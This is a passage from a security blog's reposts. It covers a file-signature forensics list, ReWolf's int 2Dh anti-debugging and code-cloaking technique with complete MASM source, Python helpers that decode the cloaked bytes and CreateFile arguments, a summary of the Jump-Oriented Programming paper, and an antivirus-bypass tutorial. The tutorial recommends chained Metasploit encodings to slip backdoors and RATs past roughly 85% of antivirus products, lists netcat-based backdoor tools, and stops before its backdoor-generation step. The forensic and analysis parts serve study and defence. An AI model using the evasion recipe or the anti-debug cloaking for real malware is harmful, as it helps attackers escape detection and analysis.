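        labels = identify(blob)
        print(name, labels, [trailer_ok(blob, l) for l in labels],
              "extension mismatch" if extension_mismatch(name, blob) else "extension ok")
```

The order of `SIGNATURES` matters when several entries share a prefix (the table itself warns that a magic number generally indicates a type rather than guaranteeing it), so a longer or offset-specific entry should be listed before a shorter one that it extends.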


ACKNOWLEDGEMENTS

The following individuals have given me updates or suggestions for this list over the years: Devon Ackerman, Nazim Aliyev, Vladimir Benko, Arvin Bhatnagar, Sam Brothers, Per Christensson, Cornelis de Groot, Jeffrey Duggan, Peter Almer Frederiksen, George Harpur, Brian High, Eric Huber, Broadus Jones, Axel Kesseler, Nick Khor, Bill Kuhns, Anand Mani, Kevin Mansell, Davyd McColl, Michal, Bruce Modick, Lee Nelson, Dan P., Jorge Paulhiac, Carlo Politi, Stanley Rainey, Cory Redfern, Bruce Robertson, Thomas Rösner, Mike Sutton, Matthias Sweertvaegher, Jason Wallace, Erik van de Burgwal, Franklin Webber, Gavin Williams, Mike Wilkinson, and David Wright. I thank them and apologize if I have missed anyone.

I would like to give particular thanks to Danny Mares of Mares and Company, author of the MaresWare Suite (primarily for the "subheaders" for many of the file types here), and the people at X-Ways Forensics for their permission to incorporate their lists of file signatures.


posted by 블르샤이닝 2012. 9. 3. 16:28

Int 2Dh debugger detection and code obfuscation - ReWolf^HTB

;
; Date: 14.III.2007
;
;
; I. BACKGROUND
;
;       Possibly new method of debugger detection, and nice way for code
;    obfuscation.
;
;
; II. DESCRIPTION
;
;       Int 2Dh is used by ntoskrnl.exe to play with DebugServices (ref1),
;    but we can use it also in ring3 mode. If we try to use it in a normal
;    (not debugged) application, we will get an exception. However if we
;    attach a debugger, there will be no exception.
;
;       push    offset _seh     ;\
;       push    fs:[0]          ; > set SEH
;       mov     fs:[0], esp     ;/
;
;       int     2dh             ; if debugger attached it will run normally,
;                               ; else we've got exception
;       nop
;       pop     fs:[0]          ;\ clear SEH
;       add     esp, 4          ;/
;
;       ...
;       debugger detected
;       ...
;
;       _seh:
;       debugger not detected
;
;    It can also crash SoftIce DbgMsg driver (ref2).
;
;       Besides this, int 2Dh can also be used as a code obfuscation method.
;    With a debugger attached, after executing int 2Dh the system skips one
;    byte after int 2Dh:
;
;       int     2dh
;       nop                     ; never executed
;       ...
;
;    If we execute step into/step over on int 2Dh, different debuggers
;    will behave in different ways:
;
;       OllyDbg - run until next breakpoint (if we have any)
;       Visual Studio - stop on instruction after nop in our example
;       WinDbg - stop after int 2dh (always, even if we 'Go')
;
;    Only OllyDbg behaves correctly if we let the process run without any
;    breaks. We can create a self-debugging application (as in the attached
;    example) that takes advantage of int 2Dh code obfuscation.
;
;
; III. Links
;
;    1. http://www.vsj.co.uk/articles/display.asp?id=265
;    2. http://www.piotrbania.com/all/adv/sice-adv.txt
;
;
; IV. Thanks
;
;    omega red, Gynvael Coldwind, ved, Piotr Bania
;
;
; comments, suggestions, job opportunities: rewolf@poczta.onet.pl
;                                           http://www.rewolf.prv.pl
;---------------------------------------------------------------------------
;
;change file extension to .asm and compile
;tested on: Win XP Pro sp2 (x86), Win 2k3 server (x64), Vista Ultimate (x64)
;
;---------------------------------------------------------------------------

.386
.model flat, stdcall
option casemap:none
;---------------------------------------------------------------------------
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32
includelib \masm32\lib\user32
;---------------------------------------------------------------------------
.data
procinfo  PROCESS_INFORMATION <0>
startinfo STARTUPINFO <0>
debugEvt  DEBUG_EVENT <0>
_str      db 100 DUP (0)
_fmt      db 'eax: %08X',0dh,0ah,'ebx: %08X',0dh,0ah,'ecx: %08X',0dh,0ah,
             'edx: %08X',0

;---------------------------------------------------------------------------
;CLOAKxB -> cloaks x bytes instruction

CLOAK1B macro ;int.int
    int 2dh
    db 0cdh
endm

CLOAK2B macro ;int.ret
    int 2dh
    db 0c2h
endm

CLOAK3B macro ;int.enter
    int 2dh
    db 0c8h
endm

CLOAK4B macro ;int.call
    int 2dh
    db 0e8h
endm

;If you find some other 'cloaking' opcodes i.e. 5 or more bytes please send
;me e-mail ;-)

;---------------------------------------------------------------------------
;sample mov r32, val macro

MOV_REG macro reg1:REQ, val1:REQ, val2:REQ, val3:REQ, val4:REQ
    int 2dh
    int reg1                        ;\
    int val3                        ; >mov eax, (val1)CD(val3)CD
    int val1                        ;/
    int 2dh
    ;enter 78xxh, 90h               ;  mov al, val4
    db 0c8h, reg1 - 8, val4, 90h
    int 2dh
    ;enter 0xxc1h, 10h              ;  ror eax, 10h
    db 0c8h, 0c1h, reg1 + 10h, 10h
    int 2dh
    ;enter 34xxh, 90h               ;  mov al, val2
    db 0c8h, reg1 - 8, val2, 90h
    int 2dh
    ;enter 0xxc1h, 10h              ;  ror eax, 10h
    db 0c8h, 0c1h, reg1 + 10h, 10h
endm
;---------------------------------------------------------------------------
MOV_EAX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ
    MOV_REG 0b8h, val1, val2, val3, val4
endm

MOV_EBX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ
    MOV_REG 0bbh, val1, val2, val3, val4
endm

MOV_ECX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ
    MOV_REG 0b9h, val1, val2, val3, val4
endm

MOV_EDX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ
    MOV_REG 0bah, val1, val2, val3, val4
endm
;---------------------------------------------------------------------------
.code
start:

assume fs:nothing
    push offset _seh                ;\
    push fs:[0]                     ; > set SEH
    mov fs:[0], esp                 ;/

    int 2dh                         ; if debugger attached it will run normally,
                                    ; else we've got exception
    nop
    pop fs:[0]                      ;\ clear SEH
    add esp, 4                      ;/

;---------------------------------------------------------------------------

    MOV_EAX 98h, 76h, 54h, 32h      ; mov eax, 98765432h
    MOV_EBX 12h, 34h, 56h, 78h      ; mov ebx, 12345678h
    MOV_ECX 0abh, 0cdh, 0efh, 0     ; mov ecx, 0abcdef00h
    MOV_EDX 90h, 0efh, 0cdh, 0abh   ; mov edx, 90efcdabh

;---------------------------------------------------------------------------

    CLOAK1B
    push edx
    CLOAK1B
    push ecx
    CLOAK1B
    push ebx
    CLOAK1B
    push eax
    CLOAK4B
    push offset _fmt
    CLOAK4B
    push offset _str
    CLOAK4B
    call wsprintf
    CLOAK3B
    add esp, 18h
    CLOAK2B
    push 0
    CLOAK4B
    push offset _str
    CLOAK4B
    push offset _str
    CLOAK2B
    push 0
    CLOAK4B
    call MessageBox
    CLOAK2B
    push 0
    CLOAK2B
    jmp _end2
;---------------------------------------------------------------------------
_seh:
    ; setting mini-debugger ;-)
    push offset procinfo
    push offset startinfo
    push 0
    push 0
    push DEBUG_PROCESS
    push 0
    push 0
    push 0
    call GetCommandLine
    push eax
    push 0
    call CreateProcess

_dbgloop:
    push INFINITE
    push offset debugEvt
    call WaitForDebugEvent

    cmp debugEvt.dwDebugEventCode, EXIT_PROCESS_DEBUG_EVENT
    je _end

    push DBG_CONTINUE
    push debugEvt.dwThreadId
    push debugEvt.dwProcessId
    call ContinueDebugEvent

    jmp _dbgloop

_end:   push 0
_end2:  call ExitProcess
end start
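When this technique shows up in a sample under analysis, the practical question for the analyst is how to recover the real instruction stream from the "cloaked" bytes. The following is an added example, not part of ReWolf's source: it reproduces byte for byte what the MOV_REG macro above emits, strips every `CD 2D` together with the one byte the article says is skipped when a debugger is attached, and then feeds the handful of opcodes that remain (mov r32,imm32; mov r8,imm8; ror r32,imm8; nop) through a deliberately tiny interpreter to confirm the register value the macro was written to produce. Function names and the interpreter are this example's own; it models only the debugger-attached path, since without a debugger the same bytes raise an exception and control goes to the SEH handler instead.

```python
"""Recovering the instructions hidden behind int 2Dh "cloaks".

Added example (not from the original listing). It models the page's claim
that, with a debugger attached, execution resumes one byte past int 2Dh.
"""
from typing import Dict, List, Tuple

INT_2D = bytes([0xCD, 0x2D])

# Cloaking opcodes named in the listing -> the instruction a linear
# disassembler would believe it is looking at.
CLOAK_BYTES = {0xCD: "int", 0xC2: "ret", 0xC8: "enter", 0xE8: "call"}


def mov_reg_cloaked(reg_opcode: int, v1: int, v2: int, v3: int, v4: int) -> bytes:
    """Byte-for-byte expansion of the MOV_REG macro (reg_opcode is B8h..BBh)."""
    return bytes([
        0xCD, 0x2D, 0xCD, reg_opcode, 0xCD, v3, 0xCD, v1,  # int 2dh / int reg1 / int val3 / int val1
        0xCD, 0x2D, 0xC8, reg_opcode - 8, v4, 0x90,        # int 2dh / enter hiding "mov r8, val4" + nop
        0xCD, 0x2D, 0xC8, 0xC1, reg_opcode + 0x10, 0x10,   # int 2dh / enter hiding "ror r32, 10h"
        0xCD, 0x2D, 0xC8, reg_opcode - 8, v2, 0x90,        # int 2dh / enter hiding "mov r8, val2" + nop
        0xCD, 0x2D, 0xC8, 0xC1, reg_opcode + 0x10, 0x10,   # int 2dh / enter hiding "ror r32, 10h"
    ])


def strip_int2d_cloaks(code: bytes) -> Tuple[bytes, List[Tuple[int, str]]]:
    """Remove each CD 2D and the byte after it; report where each cloak sat.

    A plain linear scan like this is an analyst's static view: it assumes
    every CD 2D is an executed int 2Dh and not, say, part of an immediate.
    """
    out = bytearray()
    cloaks: List[Tuple[int, str]] = []
    i = 0
    while i < len(code):
        if code[i:i + 2] == INT_2D:
            hidden = code[i + 2] if i + 2 < len(code) else None
            label = CLOAK_BYTES.get(hidden, "eof" if hidden is None else "byte %02X" % hidden)
            cloaks.append((i, label))
            i += 3                      # skip int 2Dh and the cloaked byte
            continue
        out.append(code[i])
        i += 1
    return bytes(out), cloaks


REG32 = ["eax", "ecx", "edx", "ebx"]    # register order of the B8+r / B0+r / C8+r encodings


def run_mov_chain(code: bytes) -> Dict[str, int]:
    """Interpret only the opcodes the macro leaves behind once de-cloaked."""
    regs = {r: 0 for r in REG32}
    i = 0
    while i < len(code):
        op = code[i]
        if op == 0x90:                                  # nop
            i += 1
        elif 0xB8 <= op <= 0xBB:                        # mov r32, imm32
            regs[REG32[op - 0xB8]] = int.from_bytes(code[i + 1:i + 5], "little")
            i += 5
        elif 0xB0 <= op <= 0xB3:                        # mov r8 (al/cl/dl/bl), imm8
            r = REG32[op - 0xB0]
            regs[r] = (regs[r] & 0xFFFFFF00) | code[i + 1]
            i += 2
        elif op == 0xC1 and 0xC8 <= code[i + 1] <= 0xCB:  # ror r32, imm8
            r = REG32[code[i + 1] - 0xC8]
            n = code[i + 2] & 31
            regs[r] = ((regs[r] >> n) | (regs[r] << (32 - n))) & 0xFFFFFFFF
            i += 3
        else:
            raise ValueError("unsupported opcode %02X at offset %d" % (op, i))
    return regs


def decode_mov_eax_example() -> Dict[str, int]:
    """MOV_EAX 98h, 76h, 54h, 32h from the listing: cloaked, stripped, executed."""
    clean, _ = strip_int2d_cloaks(mov_reg_cloaked(0xB8, 0x98, 0x76, 0x54, 0x32))
    return run_mov_chain(clean)


if __name__ == "__main__":
    blob = mov_reg_cloaked(0xB8, 0x98, 0x76, 0x54, 0x32)
    clean, cloaks = strip_int2d_cloaks(blob)
    print("cloaked :", blob.hex(" "))
    print("cleaned :", clean.hex(" "))
    print("cloaks  :", cloaks)
    print("eax = %08X" % run_mov_chain(clean)["eax"])
```

Running it shows why a disassembler that does not know the int 2Dh rule reads the macro as a string of `int`/`enter` instructions, while the stripped stream is four ordinary moves and rotates that assemble 98765432h into eax.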

posted by 블르샤이닝 2012. 6. 28. 12:59

Ugh, why was it so hard to find the CreateFile argument values in hex... -_-;;;; It's basic, but good to know.


CreateFile

Creates or opens a file or other object.

C declaration
HANDLE CreateFileA(
    LPCTSTR lpFileName,
    DWORD dwDesiredAccess,
    DWORD dwShareMode,
    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
    DWORD dwCreationDisposition,
    DWORD dwFlagsAndAttributes,
    HANDLE hTemplateFile
);
HSP declaration
#func global CreateFile "CreateFileA" sptr,sptr,sptr,sptr,sptr,sptr,sptr
Nadesiko declaration
●CreateFile(p1,p2,p3,p4,p5,p6,p7)=DLL("kernel32.dll","HANDLE CreateFileA(
    LPCTSTR lpFileName,
    DWORD dwDesiredAccess,
    DWORD dwShareMode,
    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
    DWORD dwCreationDisposition,
    DWORD dwFlagsAndAttributes,
    HANDLE hTemplateFile
)")
Parameters
lpFileName
    Name of the file or other object.
dwDesiredAccess
    Access mode. Specify a combination of the following constants.

    Constant        Value        Meaning
    --              0            Query attributes only, without accessing the device
    GENERIC_READ    0x80000000   Read access to the file
    GENERIC_WRITE   0x40000000   Write access to the file
dwShareMode
    Share mode for access by other processes. Specify a combination of the following constants.

    Constant           Value        Meaning
    --                 0            No sharing
    FILE_SHARE_READ    0x00000001   Allow read access from other processes
    FILE_SHARE_WRITE   0x00000002   Allow write access from other processes
lpSecurityAttributes
    Pointer to a SECURITY_ATTRIBUTES structure that decides whether the handle is inherited by child processes.
    NULL is fine if it is not to be inherited.
dwCreationDisposition
    Action to take when the file does or does not exist. Specify one of the following constants.

    Constant            Value   Meaning
    CREATE_NEW          1       Creates a new file. Fails if the file already exists.
    CREATE_ALWAYS       2       Creates a new file. Overwrites the file if it already exists.
    OPEN_EXISTING       3       Opens the file. Fails if the file does not exist.
    OPEN_ALWAYS         4       Opens the file. Creates a new file if it does not exist.
    TRUNCATE_EXISTING   5       Opens the file and truncates its size to 0.
                                Valid only when dwDesiredAccess includes GENERIC_WRITE.
dwFlagsAndAttributes
    File attributes and flags. Specify a combination of the following constants;
    FILE_ATTRIBUTE_NORMAL, however, is valid only on its own.

    [Attributes]
    Constant                    Value        Meaning
    FILE_ATTRIBUTE_ARCHIVE      0x00000020   Archive
    FILE_ATTRIBUTE_HIDDEN       0x00000002   Hidden file
    FILE_ATTRIBUTE_NORMAL       0x00000080   No particular attribute. Valid only on its own.
    FILE_ATTRIBUTE_READONLY     0x00000001   Read-only
    FILE_ATTRIBUTE_SYSTEM       0x00000004   System file
    FILE_ATTRIBUTE_TEMPORARY    0x00000100   Temporary file

    [Flags]
    Constant                      Value        Meaning
    FILE_FLAG_WRITE_THROUGH       0x80000000   Write directly to disk without going through the cache
    FILE_FLAG_OVERLAPPED          0x40000000   Overlapped I/O
    FILE_FLAG_NO_BUFFERING        0x20000000   Open the file without buffering
    FILE_FLAG_RANDOM_ACCESS       0x10000000   Random access
    FILE_FLAG_SEQUENTIAL_SCAN     0x8000000    Sequential access
    FILE_FLAG_DELETE_ON_CLOSE     0x4000000    Delete the file when the handle is closed
    FILE_FLAG_POSIX_SEMANTICS     0x1000000    POSIX semantics
    FILE_FLAG_OPEN_REPARSE_POINT  0x200000     Disable NTFS reparse-point processing
hTemplateFile
    Handle to a template file. Normally 0 or NULL is fine.
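The reason this reference matters when reversing is that a debugger or API monitor shows the raw DWORDs, not the names. The following is an added example, not part of the reference above: it turns the four numeric CreateFile arguments into the constant names from the tables above and adds a few observations an analyst would want flagged (a disposition that cannot succeed with the given access, or a file that will not survive on disk). The constant values are those listed above; the `notes` heuristics and the sample call are this example's own.

```python
"""Decode raw CreateFile arguments into the constant names from the reference above.

Added example; values are taken from the tables above and the sample call
at the bottom is constructed.
"""
from typing import Dict, List

ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {0x00000001: "FILE_SHARE_READ", 0x00000002: "FILE_SHARE_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_ATTRS = {
    0x00000020: "FILE_ATTRIBUTE_ARCHIVE",   0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000080: "FILE_ATTRIBUTE_NORMAL",    0x00000001: "FILE_ATTRIBUTE_READONLY",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM",    0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",  0x40000000: "FILE_FLAG_OVERLAPPED",
    0x20000000: "FILE_FLAG_NO_BUFFERING",   0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x01000000: "FILE_FLAG_POSIX_SEMANTICS", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
}
# Attribute bits (as opposed to FILE_FLAG_* bits) other than NORMAL.
OTHER_ATTRS = {"FILE_ATTRIBUTE_ARCHIVE", "FILE_ATTRIBUTE_HIDDEN", "FILE_ATTRIBUTE_READONLY",
               "FILE_ATTRIBUTE_SYSTEM", "FILE_ATTRIBUTE_TEMPORARY"}


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    """Names of every bit in value that the table knows, lowest bit first,
    plus one entry for any bits the table does not explain."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append("0x%08X (unknown)" % leftover)
    return names


def decode_createfile(access: int, share: int, disposition: int, flags: int) -> Dict[str, object]:
    """Return the named form of the four numeric arguments plus analyst notes."""
    attrs = _bits(flags, FLAGS_ATTRS)
    notes: List[str] = []
    if "FILE_ATTRIBUTE_NORMAL" in attrs and OTHER_ATTRS & set(attrs):
        notes.append("FILE_ATTRIBUTE_NORMAL combined with other attributes (invalid per the table)")
    if "FILE_FLAG_DELETE_ON_CLOSE" in attrs:
        notes.append("file is deleted when the last handle closes; expect little on-disk evidence")
    if disposition == 5 and not access & 0x40000000:
        notes.append("TRUNCATE_EXISTING without GENERIC_WRITE; the call will fail")
    return {
        "dwDesiredAccess": _bits(access, ACCESS) or ["0 (query attributes only)"],
        "dwShareMode": _bits(share, SHARE) or ["0 (no sharing)"],
        "dwCreationDisposition": DISPOSITION.get(disposition, "%d (unknown)" % disposition),
        "dwFlagsAndAttributes": attrs,
        "notes": notes,
    }


if __name__ == "__main__":
    # Constructed: a call as it might appear in a trace, arguments in hex.
    for key, val in decode_createfile(0xC0000000, 0x3, 2, 0x04000080).items():
        print("%-22s %s" % (key, val))
```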

posted by 블르샤이닝 2012. 4. 6. 09:08


Some scribbles about macro viruses. Of course, I only analyzed one of the representative viruses, lol.

Still, if you know this much you'll be able to do the basics of macro analysis, lol.

There isn't much text, so it really won't be a burden~ haha.

It's about Excel macros.


당신의 엑셀은 안전한가요.doc


posted by 블르샤이닝 2011. 12. 15. 14:41
posted by 블르샤이닝 2011. 12. 15. 14:30
Source:

Researchers from North Carolina State University and National University of Singapore presented an interesting paper at ASIACCS11 titled: "Jump-Oriented Programming: A New Class of Code-Reuse Attack".


The previous image, taken from the original paper, shows the differences between the well-known Return Oriented Programming and the new Jump Oriented Programming. As in ROP, a jump-oriented program consists of a set of gadget addresses and data values loaded into memory, with the gadget addresses being analogous to opcodes within a new jump-oriented machine. In ROP, this data is stored in the stack, so the stack pointer esp serves as the "program counter" in a return-oriented program. JOP is not limited to using esp to reference its gadget addresses, and control flow is not driven by the ret instruction. Instead, JOP uses a dispatch table to hold gadget addresses and data. The "program counter" is any register that points into the dispatch table. Control flow is driven by a special dispatcher gadget that executes the sequence of gadgets. At each invocation, the dispatcher advances the virtual program counter and launches the associated gadget.

This new way of looking at code-reuse exploitation makes use of three main actors: (1) the dispatcher, which hijacks the control flow by jumping to different entries in the dispatch table; (2) the dispatch table, which holds gadget addresses and data/padding; and finally (3) the gadget catalog, which contains the actual code to be executed. Gadgets do not terminate with RET as we are accustomed to, but with a JMP to the dispatcher. A dispatcher example could be:

add %ecx, 4
jmp %[ecx]

Each time it is executed it jumps to the next gadget (+4 bytes) through the dispatch table (base address in %ecx). Each time an addressed gadget is executed it ends with a jump to the dispatcher; in this way a jumping chain is built. The paper goes on to describe a MOC example and to provide algorithms for finding JOP gadgets.

I did like this reading and I do suggest it to all the interested security guys that are reading my post, but I have some issues on believing the real implementation of the dispatcher. As you might see, the dispatcher increases the jump offset by a fixed step; this assumes that the respective gadgets don't use data or at least use a fixed number of data (variables). This is highly impractical in a real exploitation scenario in which the attacker needs many different gadgets which use respectively different quantities of data. I have made here a simple explanation of what I mean.

posted by 블르샤이닝 2011. 12. 15. 14:28
Source: http://resources.infosecinstitute.com/how-to-bypass-antivirus/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+infosecResources+(InfoSec+Resources)&utm_content=Google+Reader

How do you bypass an antivirus? This is not a new question; everyone who belongs to ethical hacking and penetration testing groups discusses this issue often. Even new users (script kiddies) are anxious to learn ways to get their keyloggers, stealers and RATs (remote administration tools) past it. Clearly, there is a pressing and widespread need to bypass an anti-virus, even in the process of penetration testing and ethical hacking, in an attempt to create a robust defense for an operating system. Let's consider a simple example: suppose a company hired you to conduct a vulnerability assessment on their network. They give you a black box test, so you aren't equipped with much information about the network. If they are using an end-to-end anti-virus solution for their network, whenever you launch a test, the anti-virus system in place will block it. So the first obstacle you'll need to overcome is bypassing the anti-virus. It is very easy to discuss a tool that can hide any file from the eye of anti-virus systems, but it is probably more effective to understand the story behind the tools or techniques in order to best implement them. In this article we will cover:

  • How Anti-virus works
  • What are the ways (techniques) to bypass an Anti-virus
  • Metasploit tutorial to bypass an anti-virus

How Anti-virus Works

It is very important to discuss the working mechanism of anti-viruses, because if you don't know how an anti-virus works or how it detects viruses, you will limit your ability to effectively cheat or bypass it. Many companies build their anti-virus in their own way, but they all share two main approaches to detecting a virus:

  • Signature based detection
  • Suspicious Behavior

Signature based detection is the most common and widely used technique: the anti-virus compares the content of the file to its signature database. Signature based detection, while fast and effective, is limited in that it can only detect known viruses. The other technique is based on monitoring suspicious activities and behavior: the anti-virus continuously observes (in real time) the behavior of a file, and if a file overwrites itself or steals data without user permission, it is treated as a virus.

Example:

Here’s an example to best understand the working mechanism of an anti-virus: let’s say you have installed an anti-virus on your computer. When you plug-in your flash drive (USB), there are two options:

  • Anti-virus will automatically detect viruses (based on suspicious activities)
  • You will launch a scan against your USB and then the anti-virus finds some virus (Signature based detection)

This is how an anti-virus works; now we need to discuss the file format. PE, or Portable Executable, is the default file format for Windows binaries. Most viruses and malware hide in PE files. So what is the structure of a Portable Executable file, and how does an anti-virus read the signature?

    +-------------------+
    | DOS-stub          |
    +-------------------+
    | PE file-header    |
    +-------------------+
    | optional header   |
    |- - - - - - - - - -|
    |                   |
    | data directories  |
    |                   |
    +-------------------+
    |                   |
    |   Image pages     |
    |                   |
    +-------------------+
    |                   |
    | section tables    |
    |                   |
    +-------------------+
    |                   |
    | section 1         |
    |                   |
    +-------------------+
    |                   |
    | ...               |
    |                   |
    +-------------------+
    |                   |
    | section n         |
    |                   |
    +-------------------+

 

This is the typical structure of a Portable Executable file. Each section can be divided into multiple sub-sections, but in this article we'll discuss it only with respect to the anti-virus detection methodology. The PE file header is the most important section, containing:


  • Signature bytes
  • Time and date stamp
  • Image base and image size
  • Stack reserve size
  • Debug table
  • Fixup table
  • Security table
  • and more

So the PE file header is the one that contains the signature and other important values of any executable file. The first field after the signature identifies the target microprocessor type. Typical microprocessor types are 16-bit, 32-bit and 64-bit; for example, the 80386 processor has the value 0x14c.
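What the paragraph calls "the signature" is easy to locate without any special tool: the DOS stub at the start of the file stores the offset of the `PE\0\0` signature in the `e_lfanew` field at 0x3C (which is how a signature can end up at an offset like E77E in one binary and elsewhere in another), and the machine type, timestamp and section count follow immediately after it. The following is an added example and not part of the article; it parses those fields from a byte buffer so a defender can triage a sample without executing it. The sample header is constructed in-line, the `MACHINE` table is limited to values I am certain of (0x14c is the 80386 value the article cites), and the function names are this example's own.

```python
"""Read the PE signature and COFF header fields without running the file.

Added example (not from the article). Field layout: "MZ" at 0, e_lfanew at
0x3C, then "PE\0\0" followed by Machine, NumberOfSections, TimeDateStamp,
PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
"""
import struct
from typing import Dict, Optional

MACHINE = {
    0x014C: "IMAGE_FILE_MACHINE_I386",    # the 0x14c value the article mentions
    0x8664: "IMAGE_FILE_MACHINE_AMD64",
    0x01C0: "IMAGE_FILE_MACHINE_ARM",
    0xAA64: "IMAGE_FILE_MACHINE_ARM64",
}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000


def parse_pe_header(data: bytes) -> Optional[Dict[str, object]]:
    """Return the COFF header fields, or None if data is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # 4 bytes of signature + 20 bytes of COFF header must fit in the buffer.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINE.get(machine, "0x%04X (unknown)" % machine),
        "number_of_sections": nsections,
        "time_date_stamp": timestamp,
        "size_of_optional_header": opt_size,
        "characteristics": characteristics,
        "is_executable_image": bool(characteristics & IMAGE_FILE_EXECUTABLE_IMAGE),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
    }


def _build_sample_pe() -> bytes:
    """Constructed minimal image: DOS header pointing at a PE header at 0x80."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x4E9A1B2C, 0, 0, 0xE0,
                       IMAGE_FILE_EXECUTABLE_IMAGE | 0x0100)   # 0x0100 = 32-bit machine
    return bytes(dos) + b"PE\0\0" + coff


SAMPLE_PE = _build_sample_pe()

if __name__ == "__main__":
    for name, blob in [("sample.exe", SAMPLE_PE), ("not_pe.bin", b"\x7fELF" + b"\x00" * 60)]:
        print(name, parse_pe_header(blob))
```

The parser deliberately stops at the COFF header: that is where the machine type and the other values the article lists live, and a triage script should refuse to go further into a file whose `e_lfanew` points outside the buffer.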

Let's take the example of a typical netcat backdoor listener, which binds cmd on port number 99 for connecting to the server. By doing a little analysis, we can see that the signature is located at offset E77E.

Now just imagine the importance of the signature in any portable executive file. There are different tools available to find it. If you want to bypass an anti-virus, then you’ll need to modify this signature so that the anti-virus treats it as a normal file.

Below is the list of some utilities that are based on netcat and have the ability to bypass anti-viruses.

  • Cryptcat Project: This is an advanced utility based on netcat that adds encryption, with ports for Windows, BSD and Linux.
  • MOCAT backdoor: This one is based on the cryptcat project and works as a client/server pair, meaning it has two executables: one for Windows and the other for Linux. All communications of MOCAT are encrypted.
  • Ncat: Ncat is a wonderful tool that has been designed by the nmap community. It works on both TCP and UDP ports and on IPv4 as well as IPv6.

Bypass an Anti-virus – Metasploit Tutorial

 

The first part of our discussion focused on the importance of encoding to bypass an anti-virus. Metasploit is a wonderful tool with many encoders for bypassing anti-viruses. Some of the encoders are based on polymorphic code (as in a polymorphic virus): polymorphic code changes its signature every time it infects a new file. shikata_ga_nai seems to be the best encoder for encoding a virus so that the file bypasses most anti-viruses. According to a wonderful blog post published on secmaniac, the best combination to bypass almost 85% of anti-viruses is:

  • Shikata encoding 5 times
  • Alpha_Upper encoding 2 times
  • Shikata encoding 5 times
  • Countdown encoding 5 times

 

Within the social engineering toolkit encoder list, shikata_ga_nai is a particularly good encoder. Take a look at the picture below:

You can find a list of available encoders on metasploit. Please follow the commands below:

 root@bt:~# msfencode -h 

    Usage: /opt/framework/msf3/msfencode

OPTIONS: 

    -a   The architecture to encode as
    -b   The list of characters to avoid: '\x00\xff'
    -c   The number of times to encode the data
    -d   Specify the directory in which to look for EXE templates
    -e   The encoder to use
    -h        Help banner
    -i   Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m   Specifies an additional module search path
    -n        Dump encoder information
    -o   The output file
    -p   The platform to encode for
    -s   The maximum size of the encoded data
    -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -v        Increase verbosity
    -x   Specify an alternate executable template 

---------------------------------------------------------------------------------------------------------------------------
root@bt:~# msfencode -l 

Framework Encoders
================== 

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder

 

Example without Encoder

The first demonstration was done without using any encoder. On the second, I will use the best encoder, after which we’ll compare the results of both. Here is the simple backdoor generation step:

